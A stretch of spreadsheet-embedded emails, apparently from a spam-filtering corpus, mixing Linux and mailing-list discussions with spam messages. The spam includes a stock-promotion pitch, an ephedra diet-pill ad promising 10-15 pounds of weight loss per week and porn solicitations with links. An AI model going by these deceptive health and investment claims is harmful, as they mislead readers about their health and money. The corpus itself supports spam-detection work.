 &gt;         raid-disk       1
 &gt; 
 &gt;         failed-disk     1
  I should have had:
 &gt; raiddev /dev/md0
 &gt;         raid-level      1
 &gt;         nr-raid-disks   2
 &gt;         nr-spare-disks  0
 &gt;         chunk-size     4
 &gt;         persistent-superblock 1
 &gt;         device          /dev/hdg3
 &gt;         raid-disk       0
 &gt;         device          /dev/hda5
 &gt;         failed-disk     1
  It likely means that I was just lucky I put the failed-disk directive
 after the raid-disk one :)
  Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On boot, I see:
 Partition check:
  hda: [PTBL] [2482/255/63] hda1 hda2 hda3 hda4 &lt; hda5 &gt;
  hdg: [PTBL] [2434/255/63] hdg1 hdg2 hdg3
 floppy0: no floppy controllers found
 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize
 ide-floppy driver 0.99.newide
 md: md driver 0.90.0 MAX_MD_DEVS=256, MD_SB_DISKS=27
 md: Autodetecting RAID arrays.
  [events: 00000000]
 md: invalid raid superblock magic on hda2
 md: hda2 has invalid sb, not importing!
 md: could not import hda2!
  [events: 00000004]
  [events: 00000002]
  [events: 00000004]
 md: autorun ...
 md: considering hdg3 ...
 md:  adding hdg3 ...
 md:  adding hda5 ...
 md: created md0
 md: bind&lt;hda5,1&gt;
 md: bind&lt;hdg3,2&gt;
 md: running: &lt;hdg3&gt;&lt;hda5&gt;
 md: hdg3's event counter: 00000004
 md: hda5's event counter: 00000004
 md: RAID level 1 does not need chunksize! Continuing anyway.
 kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2
 md: personality 3 is not loaded!
 md :do_md_run() returned -22
 md: md0 stopped.
 md: unbind&lt;hdg3,1&gt;
 md: export_rdev(hdg3)
 md: unbind&lt;hda5,0&gt;
 md: export_rdev(hda5)
 md: considering hdg1 ...
 md:  adding hdg1 ...
 md: created md1
 md: bind&lt;hdg1,1&gt;
 md: running: &lt;hdg1&gt;
 md: hdg1's event counter: 00000002
 md: RAID level 1 does not need chunksize! Continuing anyway.
 kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2
 md: personality 3 is not loaded!
 md :do_md_run() returned -22
 md: md1 stopped.
 md: unbind&lt;hdg1,0&gt;
 md: export_rdev(hdg1)
 md: ... autorun DONE.
  Any ideas why ?
  My suspicion is that I've a lack of knowledge about how initrd works, so
 I'm not sure it's loading it. For a start, the / filesystem is being
 mounted as ext2, at first, not ext3. It does seem mounted as ext3 after
 the fsck is done - but that means that it's mounted as ext2 read only,
 fsck'ed and then remounted ext3. Losing the point of it.
  Given I can't pass the kernel parameters (I think), how then can I get it
 to load the initrd ?
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Owen Byrne writes:
 &gt; [quoting http://www.quinion.com/words/qa/qa-shi2.htm]
 &gt; *SHIVER MY TIMBERS*
 &gt; 
 &gt; /From Tad Spencer/: "Please could you tell me where the phrase /shiver 
 &gt; my timbers/ originated?"
 &gt; 
 &gt; This is one of those supposedly nautical expressions that seem to be 
 &gt; better known through a couple of appearances in fiction than by any 
 &gt; actual sailors' usage.
 &gt; 
 &gt; It's an exclamation that may allude to a ship striking some rock or 
 &gt; other obstacle so hard that her timbers shiver, or shake, so implying a 
 &gt; calamity has occurred. It is first recorded as being used by Captain 
 &gt; Frederick Marryat in /Jacob Faithful/ in 1835: "I won't thrash you Tom. 
 &gt; Shiver my timbers if I do".
 It seems implausible to me that "shiver" here means "to shake"; I don't
 recall seeing the word used transitively in that sense, and web1913
 lists that sense as "v. i.", or intransitive.  The transitive sense of
 "shiver", which we no longer use but which people used widely in the
 1800s (web1913 doesn't even list it as archaic or obsolete), means
 "to shatter into splinters, normally with a blow".
 Shivering a boat's timbers, of course, leaves you with no boat.
 (Shivering some of them, which will happen if you hit a rock hard enough,
 leaves you with a sinking boat.)
 So, "Shiver my timbers if I do," can be reasonably interpreted as a more
 vivid way of saying, "May I die suddenly if I do."  The interpretation
 suggested by Quinion, "May my boat be damaged," neither makes as much
 sense in context nor obeys the normal rules of grammar.
 I've sent a copy of this to Quinion.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mail delivery failure
</t>
  </si>
  <si>
    <t xml:space="preserve">This message was created automatically by mail delivery
 software. A message that you sent could not be delivered
 to all of its recipients.
 The following message, addressed to 'meow1p654@epoq.demon.co.uk',
 failed because it has not been collected after 30 days
 Here is a copy of the first part of the message, including
 all headers.
 ---- START OF RETURNED MESSAGE ----
 Received: from punt-2.mail.demon.net by mailstore for meow1p654@epoq.demon.co.uk
           id 1024819224:20:29436:23; Sun, 23 Jun 2002 08:00:24 GMT
 Received: from dogma.slashnull.org ([212.17.35.15]) by punt-2.mail.demon.net
            id aa2004348; 23 Jun 2002 8:00 GMT
 Received: (from yyyy@localhost)
 	by dogma.slashnull.org (8.11.6/8.11.6) id g5N80GR10697
 	for meow1p654@epoq.demon.co.uk; Sun, 23 Jun 2002 09:00:16 +0100
 Date: Sun, 23 Jun 2002 09:00:16 +0100
 Message-Id: &lt;200206230800.g5N80GR10697@dogma.slashnull.org&gt;
 From: yyyy@spamassassin.taint.org (Justin Mason)
 Subject: away from my mail
 Precedence: junk
 [this mail is automatically generated by the 'vacation' program]
 I will not be reading my mail for a while -- in fact, I will be reading my mail
 very intermittently until June, as I'm travelling around the world.
 Your mail regarding "Immediately Attract Women          .                PVWPJ" will be read at that point.
 If you're writing about something NetNote-related, please contact Nicola
 McDonnell &lt;nicola@netnoteinc.com&gt;.  
 SpamAssassin-related contact should be directed to the SpamAssassin-talk
 mailing list &lt;spamassassin-talk@lists.sf.net&gt;, or to Craig Hughes
 &lt;craig@hughes-family.org&gt;.
 Sitescooper-related mail should go to &lt;sitescooper-talk@lists.sf.net&gt;.
 WebMake-related stuff goes to, you guessed it, &lt;webmake-talk@lists.sf.net&gt; ;)
 I will (probably) read your mail eventually... but it will take a while.
 See you in June!
 --j.
 ---- END OF RETURNED MESSAGE ----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blue horseshoe meet me
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_2554534503687811774
 Content-Type: text/plain;
 	charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Dear Reader:
 We sometimes approach our analysts for their thoughts on emerging market =
 sectors we're interested in. On certain occasions, they come to us with =
 intriguing insights of certain aspects of the market that have caught their =
 attention.
 As you know our track record speaks for itself we are happy to bring you =
 another situation with HUGE upside potential we think this could be the one =
 that when we look back shortly everyone will be saying I should have more.
 For more info &lt;a href="http://www.terra.es/personal9/tradeonline/mbay.html" =
 target="_"&gt;CLICK HERE!!!&lt;/a&gt;
 Remember: Nothing Ventured, Nothing Gained
 ------=_NextPart_2554534503687811774
 Content-Type: text/html;
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;table width=3D"600"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;FONT face=3D"Arial"&gt;
 Dear Reader:&lt;br&gt;&lt;br&gt; 
 We sometimes approach our analysts for their thoughts on emerging market =
 sectors we're interested in. On certain occasions, they come to us with =
 intriguing insights of certain aspects of the market that have caught their =
 attention.&lt;br&gt;&lt;br&gt;
 As you know our track record speaks for itself we are happy to bring you =
 another situation with HUGE upside potential we think this could be the one =
 that when we look back shortly everyone will be saying I should have more.=
 &lt;br&gt;&lt;br&gt;
 For more info &lt;a href=3D"http://www.terra.es/personal9/tradeonline/mbay.html" =
 target=3D"_"&gt;CLICK HERE!!!&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 Remember: Nothing Ventured, Nothing Gained&lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------=_NextPart_2554534503687811774--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002 23:38:09 +0100
 Brian Foster claiming to think:
 &gt;  but, like the classic techniques, there is no rolling
 &gt;  back of accidental overwrites.
 &gt; 
 &gt;  ( rolling back overwrites reminds me of the "snapshot"
 &gt;   facility on NetWork Appliance fileservers.  and of the
 &gt;   various "versioning" filesystems which appeared --- and
 &gt;   then vanished? --- over the years.... )
 &gt; 
 and it's in FreeBSD 5.0-CURRENT AFAIK...
 /me migrates every linux box to the one true way..
 L.
 -- 
      dBP   dBBBBb | If you're looking at me to be an accountant
               dBP | Then you will look but you will never see
    dBP    dBBBK'  | If you're looking at me to start having babies
   dBP    dB' db   | Then you can wish because I'm not here to fool around
  dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 08:00:00PM -0700,
 Jehan &lt;nahor@bravobrava.com&gt; is thought to have said:
 &gt; Actually you would be inaccurate in your action in a way. The correct 
 &gt; behavior would be to unsubscribe razor-users@fsckit.net from the mailing 
 &gt; list.
 Wow. I think a majority of the anti-spam community out there would disagree
 with you. It makes no difference what the list is, whether it's run by ZDNet
 or Empire Towers, whether it uses open proxies and relays or a MLM like
 mailman or Lyris. In either case I was added to a list against my will to 
 receive unsolicited bulk email. I shouldn't have to 'just unsubscribe from
 the list' any more than I should have to send email with the subject REMOVE
 to removemeblahblah1234@yahoo.com or go to http://www.centralremovelist.com/
 to 'unsubscribe' from some viagra spam. Or are you advocating that as well?
 &gt; But in any case, you have to understand that you and him would not be 
 &gt; the only one involved. As I said in a another thread, you probably get 
 &gt; hurt only if you are against the majority of people (which makes sense). 
 &gt; If you are with the majority, you get a bonus (which also makes sense). 
 &gt; If there is no majority, nobody wins or lose.
 That's fine. But my point is that neither person in my example was
 committing an inherently untrustworthy act. Yet someone's TES would likely
 fall because of it.
 &gt; Razor is designed for the betterment of most people, i.e. the majority, 
 &gt; not for the individual. If one doesn't agree with the majority, he 
 &gt; should use the razor-whitelist or create a blacklist (BTW, why doesn't 
 &gt; razor provide a razor-blacklist too?)
 Hmm. Good point about razor-whitelist. I'd forgotten about that.
 -- 
 --------------------------------------------------------------------
 Tabor J. Wells                                     twells@fsckit.net
 Fsck It!                 Just another victim of the ambient morality
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">There's nothing you can know that isn't known.
 Nothing you can see that isn't shown.
 Nowhere you can be that isn't where you're meant to be.
 It's easy.
 All you need is HTML.
 By way of proof, there are no jpgs, gifs, pngs, etc here...
 http://www.anagrammy.com/anagflag.html
 Cheers,
 Wayne
 Yeah yeah yeah
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] NVIDIA and Debian Woody
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,
 Now this is probably of no use to you whatsoever, but...
 Not a deb-head, but I also have a problem regards NVidia. I've two machines,
 pretty much the same hardware. 
 athlon 1700XP's, both have NVidia cards, one Gforce3 Ti and a Gforce2MX,
 both use the same driver module. 
 Both have same kernel version albeit it compiled for their particular
 hardware.
 One works perfectly, the other fails to load. When I check with lsmod, I can
 see the NVdriver is loaded, but not used ;--(
 Thus when I startx, it bombs out. 
 IU still have X with the default nv driver and crappy accelleration --&gt;
 650fps with glxgears [should be over 2000fps]
 Its not a hardware issue with the cards as I swapped them over and get the
 same symptoms. 
 I reckon my mobo is cack, I've tried swapping slots around, reserving
 resources etc all to no avail. 
 Should there be an interrupt for the nv card? I haven't checked the other
 box yet.
 Regards,
 CW
 -------------------
 On Tue, 03 Dec 2002, Mark Page wrote:
 &gt; Was running Debian Woody perfectly well until I installed the NVIDIA 3D 
 &gt; tar packages.
 You probably stil are ;)
 &gt; Both the kernel and GLX packages installed with no problem and I then 
 &gt; amended the XFree config file appropriately (according to all 
 &gt; instructions). Neither GDM nor KDM will now fire up returning me to the 
 &gt; console screen. 
 ie X is broken. 
 &gt; Running startx I isolated the problem to a failure to load the nvidia
 &gt; kernel module - By cd'ing to the kernel module file and re-running 'make
 &gt; install' I can get a workable xserver 
 so you fixed X.
 &gt; minus the preferences you would get from either gdm or kdm and to be
 &gt; honest the GUI is horrible.
 If X is working and you get a brief Nvidia splash screen then this is
 likely nothing to do with the driver itself.  You should be able to use kdm
 or gdm with the nvidia Xserver.  What exactly did you change in your
 XF86Config?  Will gdm/kdm not start?
 &gt; I followed the nvidia suggestion of 'make install 
 &gt; SYSINCLUDE=/path/to/kernel/headers' and whilst this appears to install 
 &gt; ok upon reboot I am back to the same console login and having to go 
 &gt; through the same reinstall of the kernel module. I have tried rewriting 
 &gt; the XF config file to it's original state with no success.
 Well, this sounds like the NVIDIA kernel module isn't loading on boot.
 When it *is* working do a quick 
 /sbin/lsmod
 and look for the module name (something like 'NVDriver').  Then put this on
 a new line in 
 /etc/modules
 in order that linux will load it on boot.  You can just do
 modprobe nvdriver
 to load it by hand.  Your make install did this as well as reinstalling the
 driver in /lib etc.  You should also get a message saying loading the
 nvidia driver taints your kernel (which it does, in the sense that it's not
 open source).
 &gt; Is this a problem anyone else has encountered and what is the best 
 &gt; solution? Can I rid myself of the tar file installations and find some 
 &gt; specific .deb packages?
 The nvidia driver source is in the Woody tree.
 http://packages.debian.org/stable/x11/nvidia-kernel-src.html
 so you can do
 apt-get install nvidia-kernel-src
 and then compile, although I've always gone the route you're doing now.
 Ideally the nvidia driver would be a part of the kernel from day 1.
 However, nvidia have not open sourced it (most of the above source is
 pre-compiled object code), but in order for it to work with your specific
 kernel you must compile against your kernel headers (as you did).  As
 debian has lots of potential kernels they can't have one nvdriver package
 and have chosen instead to provide the source.  Actually I don't know if
 they're permitted to distribute binaries by nvidia's license anyway.
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Wed, 02 Oct 2002 01:30:24 -0400
 From: "John S. Denker" &lt;jsd@monmouth.com&gt;
 Subject: Re: Optical analog computing?
 Sender: jsd@no.domain.spam
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,
  cryptography@wasabisystems.com
 "R. A. Hettinga" wrote:
 ...
 &gt; "the first computer to crack enigma was optical"
 &gt; "the first synthetic-aperture-radar processor was optical"
 &gt; "but all these early successes were classified -- 100 to 200 projects,
 &gt; and I probably know of less than half."
 &gt;
 &gt; --&gt; Do these claims compute?! is this really a secret history, or does
 &gt; this mean holography, of am I just completely out of the loop?1
 Gimme a break.  This is remarkable for its lack of
 newsworthiness.
 1) Bletchley Park used optical sensors, which were (and
 still are) the best way to read paper tape at high speed.
 You can read about it in the standard accounts, e.g.
   http://www.picotech.com/applications/colossus.html
 2) For decades before that, codebreakers were using optical
 computing in the form of superposed masks to find patterns.
 You can read about it in Kahn.
 3) People have been doing opto-electronic computing for
 decades.  There's a lot more to it than just holography.
 I get 14,000 hits from
   http://www.google.com/search?q=optical-computing
 &gt; Optical info is a complex-valued wave (spatial frequency, amplitude and
 &gt; phase)
 It isn't right to make it sound like three numbers (frequency,
 amplitude, and phase);  actually there are innumerable
 frequencies, each of which has its own amplitude and phase.
 &gt; lenses, refractions, and interference are the computational operators.
 &gt; (add, copy, multiply, fft, correlation, convolution) of 1D and 2D arrays
 &gt;
 &gt; and, of course, massively parallel by default.
 &gt;
 &gt; and, of course, allows free-space interconnects.
 Some things that are hard with wires are easy with
 light-waves.  But most things that are easy with wires
 are hard with light-waves.
 &gt; Here's a commercialized effort from israel: a "space integrating
 &gt; vector-matric multiplier"  [ A ] B = [ C ]
 &gt; laser-&gt; 512-gate modulator -&gt; spread over 2D
 &gt; "256 Teraflop equivalent" for one multiply per nanosecond.
 People were doing smaller versions of that in
 the 1980s.
 &gt; Unclassified example: acousto-optic spectrometer, 500 Gflops equivalent
 &gt; (for 12 watts!) doing continuous FFTs.  Launched in 1998 on a 2-year
 &gt; mission. Submillimeter wave observatory.
 Not "FFTs".  FTs.  Fourier Transforms.  All you need for
 taking a D=2 Fourier Transform is a lens.  It's undergrad
 physics-lab stuff.  I get 6,000 hits from:
   http://www.google.com/search?q=fourier-optics
 &gt; Of course, the rest of the talk is about the promise of moving from
 &gt; optoelectronic to all-optical processors (on all-optical nets &amp; with
 &gt; optical encryption, &amp; so on).
 All optical???  No optoelectronics anywhere???
 That's medicinal-grade pure snake oil, USP.
 Photons are well known for not interacting with
 each other.  It's hard to do computing without
 interactions.
 --- end forwarded text
 -- 
 -----------------
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "... however it may deserve respect for its usefulness and antiquity,
 [predicting the end of the world] has not been found agreeable to
 experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Or you could let me write one for you? Mind you ...... I know an
 &gt; awful lot about you! ;-))
 Oh, that could be interesting!
 &gt;
 &gt; Yes, I like that starlet look, but I think you should come out from
 &gt; behind that bike too and let us see what you are wearing.  looks
 &gt; pretty innerestin'
 That bike is all that's between me and my modesty.  The other photos are not
 for public consumption. :-)
 &gt; Fel
 Helen of Troy
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home for Top $
 http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose 21 Pounds In 10 Days                25654
</t>
  </si>
  <si>
    <t xml:space="preserve">Long time no chat!
 How have you been? If you've been like me, you've been trying
 trying almost EVERYTHING to lose weight. I know how you feel
 - the special diets, miracle pills, and fancy exercise 
 equipment never helped me lose the pounds I needed to lose
 either. It seemed like the harder I worked at it, the less
 weight I lost - until I heard about 'Extreme Power Plus'.
 You're probably thinking to yourself, "Oh geez, not another
 miracle diet pill!" Like you, I was skeptical at first, but 
 my sister said it helped her lose 23 pounds in just 2 weeks, 
 so I told her I'd give it a try. I mean, there was nothing 
 to lose except a lot of weight! Let me tell you, it was
 the best decision I've ever made.  PERIOD.  Six months later,
 as I'm writing this message to you, I've gone from 355 pounds
 to 210 pounds, and I haven't changed my exercise routine or diet
 at all. Yes, I still eat pizza, and lots of it!
 I was so happy with the results that I contacted the manufacturer
 and received permission to resell it - at a HUGE discount.I feel
 the need to help other people lose weight like I did, because it
 does so much for your self-esteem, not to mention your health.
 I am giving you my personal pledge that 'Extreme Power Plus'
 absolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!
 If you are frustrated with trying other products, without having 
 any success, and just not getting the results you were promised,
 then I recommend the only product that worked for me - 
 'EXTREME POWER PLUS'!
 You're probably asking yourself, "Ok, so how does this stuff
 actually work?"
 Extreme Power Plus contains Lipotropic fat burners and ephedra which 
 is scientifically proven to increase metabolism and cause rapid 
 weight loss. No "hocus pocus" in these pills - just RESULTS!!! 
 Here is the bottom line ...
 I can help you lose 10-15 pounds per week naturally, without
 exercising and without having to eat rice cakes all day. 
 Just try it for one month - there's pounds to lose and confidence 
 to gain! You will lose weight fast - GUARANTEED. This is my
 pledge to you.
 BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more! 
 To order Extreme Power Plus on our secure server, just click
 on this link -&gt; http://www.2002dietspecials.com/
 To see what some of our customers have said about this product, 
 visit http://www.2002dietspecials.com/testimonials.shtml
 To see a list of ingredients and for more information
 on test studies and how it will help you lose weight, visit 
 http://www.2002dietspecials.com/ingre1.shtml
 **************************************************************
 If you feel that you have received this email in error, please 
 send an email to "print2@btamail.net.cn" requesting to be 
 removed. Thank you, and we apologize for any inconvenience.
 **************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">It's all here in these 10 lines, otherwise known as the
 "I'll try my damnest to paste something" procedure:
 # Return the current selection (from any window) or cut buffer 0.
 proc Text_Selection {} {
     if [catch {selection get} sel] {
         if [catch {selection get -selection CLIPBOARD} sel] {
             if [catch {cutbuffer get 0} sel] {
                 return ""
             }
         }
     }
     return $sel
 }
 This is in textSelection.tcl, and is what exmh uses to find text to paste.
 It is that last "cutbuffer get" that is wacky, because exmh sticks its
 own deletions into that little know stash, and is probably the only
 application on the planet that still looks there.  We should probably
 just disable that - try this variant:
 proc Text_Selection {} {
     if [catch {selection get} sel] {
         if [catch {selection get -selection CLIPBOARD} sel] {
             return ""
         }
     }
     return $sel
 }
 Everything funnels through here, so you just need to hack this one spot.
 &gt;&gt;&gt;Rick Baartman said:
  &gt; I've never understood the mouse buffer operation with exmh either. Here's th
      e 
  &gt; behaviour I have. I have exmh and XEmacs windows up, and a terminal window. 
      (I 
  &gt; also have gnome1.4 running and enlightenment as wm.) I select text in the ex
      mh 
  &gt; window and while it is highlighted, I can paste into anything else. If I sel
      ect 
  &gt; it and then click so the highlighting is off, then what I paste is not the 
  &gt; recently-selected text in exmh, but an old selection. If I select in XEmacs 
      and 
  &gt; leave it highlighted, I can paste it into exmh sedit window; but if it is no
  &gt; longer highlighted, what I paste is an old selection. I can live with this 
  &gt; behaviour except for one additional thing. If nothing is highlighted, then w
      hat 
  &gt; I paste into exmh is different from what I paste into other windows. To be m
      ore 
  &gt; specific, here's what gets pasted if nothing is highlighted:
  &gt; 
  &gt; Application       What gets pasted
  &gt; 
  &gt; XEmacs            whatever was last selected unless it was last selected in 
      exmh
  &gt; xterm             same as XEmacs
  &gt; AbiWord           nothing
  &gt; Nedit             nothing
  &gt; sedit             Whatever was last highlighted in sedit and overwritten
  &gt; 
  &gt; The last needs some amplification. If I highlight something in sedit, then 
  &gt; obviously that's what gets pasted. If the highlighting is off, then what get
      s 
  &gt; pasted is NOT what was last highlighted in sedit, but what was last highligh
      ted 
  &gt; and typed over (I have "Type Kills SEL" on.).
  &gt; 
  &gt; It seems that exmh and sedit are the oddballs here. Very often when I try to
  &gt; paste something in sedit I end up muttering WTF??
  &gt; 
  &gt; --
  &gt; rick
  &gt; 
  &gt; 
  &gt; 
  &gt; _______________________________________________
  &gt; Exmh-users mailing list
  &gt; Exmh-users@redhat.com
  &gt; https://listman.redhat.com/mailman/listinfo/exmh-users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</si>
  <si>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=?ISO-8859-1?Q?Lose=20fat=2C=20gain=20muscle=20with=20HGH?=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello andrea_justice Free Teen Action! 
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear andrea_justice ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;100% Free Porn!&lt;br&gt;
 What more can you ask for?&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;a href="http://216.129.174.178/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.&lt;br&gt;
 However, if you'd rather not receive future e-mails from us,&lt;br&gt;
 &lt;a href="mailto:cheech@inbox.lv"&gt;CLICK HERE&lt;/a&gt; to send email and add the word REMOVE in the subject line.&lt;br&gt;
 Please allow 48 hours for processing.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [9^":}H&amp;*TG0BK]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOU WON A FREE PORN PASSWORD!!
</t>
  </si>
  <si>
    <t xml:space="preserve"> midrjobs-l@midrange.com
 YOU WON A FREE PORN PASSWORD!!
 FREE PORN ACCESS ALL THE PORN YOU CAN HANDLE!!
 DO ME NOW I WANT YOU TO CUM!!!
   http://www.tnt-hosting.com/zz
 to opt out click reply you will be removed instantly
 zvqewbof-y^zvqenatr(pbz
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Friend Fry
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020718.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020718.html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&lt;/style&gt;&lt;title&gt;20020718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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.18.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Keep your Web site working fast and smart with UltraDNS.&lt;/b&gt; More reliable
 performance means more traffic, more sales, and more profits. Outsource your
 DNS management and save. Basic DNS for only $1.00 a month. 
 &lt;a href="http://servedby.advertising.com/click/site=64021/mnum=63761"&gt;Click here to
 find out more&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I thought I baked my Dell PowerEdge 1400SC server yesterday 
 when it refused to boot completely. I borrowed a data vac 
 from a friend and decided to clean all of the dust and cat 
 hair from my systems, then after reconnecting everything, 
 the server would boot to the initial splash screen, where 
 there is a POST progress bar, but would not proceed past 
 past about the first 1/5th of the bar. Uh-oh. What did I 
 fry?
 &lt;p&gt;As it turns out, it was another case of "always check the 
 small stuff". Oh, I had all of the cables plugged back in to 
 the server properly, I checked all of that, but it didn't 
 dawn on me until about a half dozen boot attempts later that 
 I should probably turn an eye toward the other end of the 
 cables. That server is connected to an 8-port Compaq KVM 
 switch and with all of the yanking, plucking and shuffling, 
 the keyboard cable had been eeked out of the switch just a 
 tad. Why the server didn't display a keyboard warning 
 message like every other computer on the planet, I can only 
 attribute to the BIOS developers. Server Satchel, running 
 Red Hat Linux 7.2 is now operating as it was previously. The 
 penguin is happy. The server case is even black. How 
 appropriate...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&lt;b&gt;Windows XP Security Checklist&lt;/b&gt;
 &lt;br&gt;Finely crafted by Bernie Klinder
 &lt;p&gt;&lt;a class="url" href="http://www.labmice.net/articles/winxpsecuritychecklist.htm"&gt;http://www.labmice.net/articles/winxpsecuritychecklist.htm&lt;/a&gt;
 &lt;p&gt;With all of the security features crammed into Windows XP, 
 where does one start? Do you need VPN capability? Is NTFS an 
 appropriate file system choice for you? Is there any value 
 at all in Simple File Sharing? After much hounding, Bernie 
 Klinder has drawn up a healthy checklist of things you need 
 to address under Windows XP in order to maintain a system 
 that is both security and compatible with the rest of your 
 computing world.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;ATI Still Makes Video Cards?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.anandtech.com/video/showdoc.html?i=1656"&gt;http://www.anandtech.com/video/showdoc.html?i=1656&lt;/a&gt;
 &lt;p&gt;Say it isn't so! Yes, apparently they do still have 
 something to say about NVIDIA's dominance in the video card 
 market. Seeing as how they've been all but dumped by the 
 majority of top-tier system makers, it's hard to believe 
 that they are capable of a serious comeback. Judging from 
 what AnandTech has to say about the forthcoming R300-based 
 cards, it appears that they haven't thrown in the towel just 
 yet. I'm all for competition, so I welcome the effective re-
 entrance into the high end market. Let's all hope that their 
 driver development has improved as much as their hardware 
 seems to have. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
